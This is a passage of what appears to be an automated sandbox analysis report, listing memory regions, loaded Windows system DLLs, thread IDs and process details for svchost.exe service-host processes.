filename = "" Region: id = 519 start_va = 0x8fca700000 end_va = 0x8fca7fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca700000" filename = "" Region: id = 520 start_va = 0x8fca800000 end_va = 0x8fca8fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca800000" filename = "" Region: id = 521 start_va = 0x8fca900000 end_va = 0x8fca9fffff entry_point = 0x0 region_type = private name = "private_0x0000008fca900000" filename = "" Region: id = 522 start_va = 0x8fcab00000 end_va = 0x8fcabfffff entry_point = 0x0 region_type = private name = "private_0x0000008fcab00000" filename = "" Region: id = 523 start_va = 0x8fcac00000 end_va = 0x8fcacfffff entry_point = 0x0 region_type = private name = "private_0x0000008fcac00000" filename = "" Region: id = 524 start_va = 0x8fcad00000 end_va = 0x8fcadfffff entry_point = 0x0 region_type = private name = "private_0x0000008fcad00000" filename = "" Region: id = 525 start_va = 0x8fcb000000 end_va = 0x8fcb0fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb000000" filename = "" Region: id = 526 start_va = 0x8fcb100000 end_va = 0x8fcb1fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb100000" filename = "" Region: id = 527 start_va = 0x8fcb200000 end_va = 0x8fcb3bcfff entry_point = 0x0 region_type = private name = "private_0x0000008fcb200000" filename = "" Region: id = 528 start_va = 0x8fcb400000 end_va = 0x8fcb4fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb400000" filename = "" Region: id = 529 start_va = 0x8fcb500000 end_va = 0x8fcb5fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb500000" filename = "" Region: id = 530 start_va = 0x8fcb600000 end_va = 0x8fcb6fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb600000" filename = "" Region: id = 531 start_va = 0x8fcb700000 end_va = 0x8fcb7fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb700000" filename = "" Region: id = 532 start_va = 0x8fcb800000 end_va = 0x8fcb8fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb800000" filename = "" Region: id = 533 start_va = 0x8fcb900000 end_va = 0x8fcb9fffff entry_point = 0x0 region_type = private name = "private_0x0000008fcb900000" filename = "" Region: id = 534 start_va = 0x8fcba00000 end_va = 0x8fcbafffff entry_point = 0x0 region_type = private name = "private_0x0000008fcba00000" filename = "" Region: id = 535 start_va = 0x8fcbd00000 end_va = 0x8fcbdfffff entry_point = 0x0 region_type = private name = "private_0x0000008fcbd00000" filename = "" Region: id = 536 start_va = 0x8fcbe00000 end_va = 0x8fcbefffff entry_point = 0x0 region_type = private name = "private_0x0000008fcbe00000" filename = "" Region: id = 537 start_va = 0x7df5ffed0000 end_va = 0x7ff5ffecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffed0000" filename = "" Region: id = 538 start_va = 0x7ff6e0be6000 end_va = 0x7ff6e0be7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0be6000" filename = "" Region: id = 539 start_va = 0x7ff6e0be8000 end_va = 0x7ff6e0be9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0be8000" filename = "" Region: id = 540 start_va = 0x7ff6e0bea000 end_va = 0x7ff6e0bebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bea000" filename = "" Region: id = 541 start_va = 0x7ff6e0bec000 end_va = 0x7ff6e0bedfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bec000" filename = "" Region: id = 542 start_va = 0x7ff6e0bee000 end_va = 0x7ff6e0beffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bee000" filename = "" Region: id = 543 start_va = 0x7ff6e0bf0000 end_va = 0x7ff6e0bf1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf0000" filename = "" Region: id = 544 start_va = 0x7ff6e0bf2000 end_va = 0x7ff6e0bf3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf2000" filename = "" Region: id = 545 start_va = 0x7ff6e0bf4000 end_va = 0x7ff6e0bf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf4000" filename = "" Region: id = 546 start_va = 0x7ff6e0bf8000 end_va = 0x7ff6e0bf9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bf8000" filename = "" Region: id = 547 start_va = 0x7ff6e0bfa000 end_va = 0x7ff6e0bfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfa000" filename = "" Region: id = 548 start_va = 0x7ff6e0bfe000 end_va = 0x7ff6e0bfffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0bfe000" filename = "" Region: id = 549 start_va = 0x7ff6e0c00000 end_va = 0x7ff6e0cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0c00000" filename = "" Region: id = 550 start_va = 0x7ff6e0d00000 end_va = 0x7ff6e0d22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0d00000" filename = "" Region: id = 551 start_va = 0x7ff6e0d26000 end_va = 0x7ff6e0d27fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d26000" filename = "" Region: id = 552 start_va = 0x7ff6e0d28000 end_va = 0x7ff6e0d28fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d28000" filename = "" Region: id = 553 start_va = 0x7ff6e0d2a000 end_va = 0x7ff6e0d2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d2a000" filename = "" Region: id = 554 start_va = 0x7ff6e0d2e000 end_va = 0x7ff6e0d2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d2e000" filename = "" Region: id = 555 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 556 start_va = 0x7ffc467c0000 end_va = 0x7ffc46817fff entry_point = 0x7ffc467c0000 region_type = mapped_file name = "ncbservice.dll" filename = "\\Windows\\System32\\ncbservice.dll" (normalized: "c:\\windows\\system32\\ncbservice.dll") Region: id = 557 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 558 start_va = 0x7ffc4a470000 end_va = 0x7ffc4a47afff entry_point = 0x7ffc4a470000 region_type = mapped_file name = "systemeventsbrokerclient.dll" filename = "\\Windows\\System32\\SystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerclient.dll") Region: id = 559 start_va = 0x7ffc4b030000 end_va = 0x7ffc4b072fff entry_point = 0x7ffc4b030000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 560 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 561 start_va = 0x7ffc4b260000 end_va = 0x7ffc4b281fff entry_point = 0x7ffc4b260000 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 562 start_va = 0x7ffc4b6f0000 end_va = 0x7ffc4b802fff entry_point = 0x7ffc4b6f0000 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 563 start_va = 0x7ffc4b810000 end_va = 0x7ffc4b88ffff entry_point = 0x7ffc4b810000 region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 564 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 565 start_va = 0x7ffc4f9d0000 end_va = 0x7ffc4f9d8fff entry_point = 0x7ffc4f9d0000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 566 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 567 start_va = 0x7ffc506a0000 end_va = 0x7ffc506d2fff entry_point = 0x7ffc506a0000 region_type = mapped_file name = "wudfplatform.dll" filename = "\\Windows\\System32\\WUDFPlatform.dll" (normalized: "c:\\windows\\system32\\wudfplatform.dll") Region: id = 568 start_va = 0x7ffc506e0000 end_va = 0x7ffc506fafff entry_point = 0x7ffc506e0000 region_type = mapped_file name = "wudfsvc.dll" filename = "\\Windows\\System32\\WUDFSvc.dll" (normalized: "c:\\windows\\system32\\wudfsvc.dll") Region: id = 569 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 570 start_va = 0x7ffc51340000 end_va = 0x7ffc513b1fff entry_point = 0x7ffc51340000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 571 start_va = 0x7ffc513c0000 end_va = 0x7ffc51409fff entry_point = 0x7ffc513c0000 region_type = mapped_file name = "audioendpointbuilder.dll" filename = "\\Windows\\System32\\AudioEndpointBuilder.dll" (normalized: "c:\\windows\\system32\\audioendpointbuilder.dll") Region: id = 572 start_va = 0x7ffc514f0000 end_va = 0x7ffc514fbfff entry_point = 0x7ffc514f0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 573 start_va = 0x7ffc51760000 end_va = 0x7ffc5181ffff entry_point = 0x7ffc51760000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 574 start_va = 0x7ffc518f0000 end_va = 0x7ffc51906fff entry_point = 0x7ffc518f0000 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 575 start_va = 0x7ffc51910000 end_va = 0x7ffc519b0fff entry_point = 0x7ffc51910000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 576 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 577 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 578 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 579 start_va = 0x7ffc52730000 end_va = 0x7ffc527f7fff entry_point = 0x7ffc52730000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 580 start_va = 0x7ffc52cd0000 end_va = 0x7ffc52d47fff entry_point = 0x7ffc52cd0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 581 start_va = 0x7ffc52e40000 end_va = 0x7ffc52e7efff entry_point = 0x7ffc52e40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 582 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 583 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 584 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 585 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 586 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 587 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 588 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 589 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 590 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 591 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 592 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 593 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 594 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 595 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 596 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 597 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 598 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 599 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 600 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 601 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 602 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 603 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 604 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 605 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 606 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 607 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 608 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 609 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 610 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 611 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 612 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 613 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 614 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 615 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 616 start_va = 0x7ffc57a30000 end_va = 0x7ffc57a9efff entry_point = 0x7ffc57a30000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 617 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 618 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2979 start_va = 0x8ec7c20000 end_va = 0x8ec7d1ffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7c20000" filename = "" Region: id = 2980 start_va = 0x7ff6e0d2c000 end_va = 0x7ff6e0d2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d2c000" filename = "" Region: id = 2981 start_va = 0x7ffc4dab0000 end_va = 0x7ffc4daccfff entry_point = 0x7ffc4dab0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 2982 start_va = 0x8ec7180000 end_va = 0x8ec71fffff entry_point = 0x0 region_type = private name = "private_0x0000008ec7180000" filename = "" Region: id = 2983 start_va = 0x7ff6e0d24000 end_va = 0x7ff6e0d25fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0d24000" filename = "" Region: id = 2984 start_va = 0x7ffc3ee00000 end_va = 0x7ffc3ee9dfff entry_point = 0x7ffc3ee00000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2985 start_va = 0x7ffc4b080000 end_va = 0x7ffc4b08ffff entry_point = 0x7ffc4b080000 region_type = mapped_file name = "pcadm.dll" filename = "\\Windows\\System32\\pcadm.dll" (normalized: "c:\\windows\\system32\\pcadm.dll") Region: id = 2986 start_va = 0x7ffc4d380000 end_va = 0x7ffc4d38efff entry_point = 0x7ffc4d380000 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 2987 start_va = 0x7ffc53810000 end_va = 0x7ffc5382bfff entry_point = 0x7ffc53810000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Thread: id = 282 os_tid = 0xa78 Thread: id = 283 os_tid = 0xa74 Thread: id = 284 os_tid = 0x930 Thread: id = 285 os_tid = 0x91c Thread: id = 286 os_tid = 0x744 Thread: id = 287 os_tid = 0x664 Thread: id = 288 os_tid = 0x660 Thread: id = 289 os_tid = 0x654 Thread: id = 290 os_tid = 0x410 Thread: id = 291 os_tid = 0x168 Thread: id = 292 os_tid = 0x40 Thread: id = 293 os_tid = 0x3c4 Thread: id = 294 os_tid = 0x3bc Thread: id = 295 os_tid = 0x364 Thread: id = 444 os_tid = 0x924 Thread: id = 445 os_tid = 0x148 Thread: id = 466 os_tid = 0xdbc Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d28e000" os_pid = "0x398" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e719" [0xc000000f], "LOCAL" [0x7] Region: id = 1497 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1498 start_va = 0x4052d70000 end_va = 0x4052d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052d70000" filename = "" Region: id = 1499 start_va = 0x4052d80000 end_va = 0x4052d80fff entry_point = 0x4052d80000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1500 start_va = 0x4052d90000 end_va = 0x4052da3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052d90000" filename = "" Region: id = 1501 start_va = 0x4052db0000 end_va = 0x4052e2ffff entry_point = 0x0 region_type = private name = "private_0x0000004052db0000" filename = "" Region: id = 1502 start_va = 0x4052e30000 end_va = 0x4052e33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e30000" filename = "" Region: id = 1503 start_va = 0x4052e40000 end_va = 0x4052e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e40000" filename = "" Region: id = 1504 start_va = 0x4052e50000 end_va = 0x4052e51fff entry_point = 0x0 region_type = private name = "private_0x0000004052e50000" filename = "" Region: id = 1505 start_va = 0x4052e60000 end_va = 0x4052e60fff entry_point = 0x0 region_type = private name = "private_0x0000004052e60000" filename = "" Region: id = 1506 start_va = 0x4052e70000 end_va = 0x4052e70fff entry_point = 0x0 region_type = private name = "private_0x0000004052e70000" filename = "" Region: id = 1507 start_va = 0x4052e80000 end_va = 0x4052e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e80000" filename = "" Region: id = 1508 start_va = 0x4052e90000 end_va = 0x4052e94fff entry_point = 0x4052e90000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1509 start_va = 0x4052ea0000 end_va = 0x4052ea6fff entry_point = 0x0 region_type = private name = "private_0x0000004052ea0000" filename = "" Region: id = 1510 start_va = 0x4052eb0000 end_va = 0x4052ec1fff entry_point = 0x4052eb0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1511 start_va = 0x4052ed0000 end_va = 0x4052ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052ed0000" filename = "" Region: id = 1512 start_va = 0x4052ee0000 end_va = 0x4052ee1fff entry_point = 0x4052ee0000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 1513 start_va = 0x4052ef0000 end_va = 0x4052ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052ef0000" filename = "" Region: id = 1514 start_va = 0x4052f00000 end_va = 0x4052ffffff entry_point = 0x0 region_type = private name = "private_0x0000004052f00000" filename = "" Region: id = 1515 start_va = 0x4053000000 end_va = 0x40530bdfff entry_point = 0x4053000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1516 start_va = 0x4053190000 end_va = 0x4053196fff entry_point = 0x0 region_type = private name = "private_0x0000004053190000" filename = "" Region: id = 1517 start_va = 0x4053200000 end_va = 0x40532fffff entry_point = 0x0 region_type = private name = "private_0x0000004053200000" filename = "" Region: id = 1518 start_va = 0x4053300000 end_va = 0x4053487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053300000" filename = "" Region: id = 1519 start_va = 0x4053490000 end_va = 0x4053610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053490000" filename = "" Region: id = 1520 start_va = 0x4053620000 end_va = 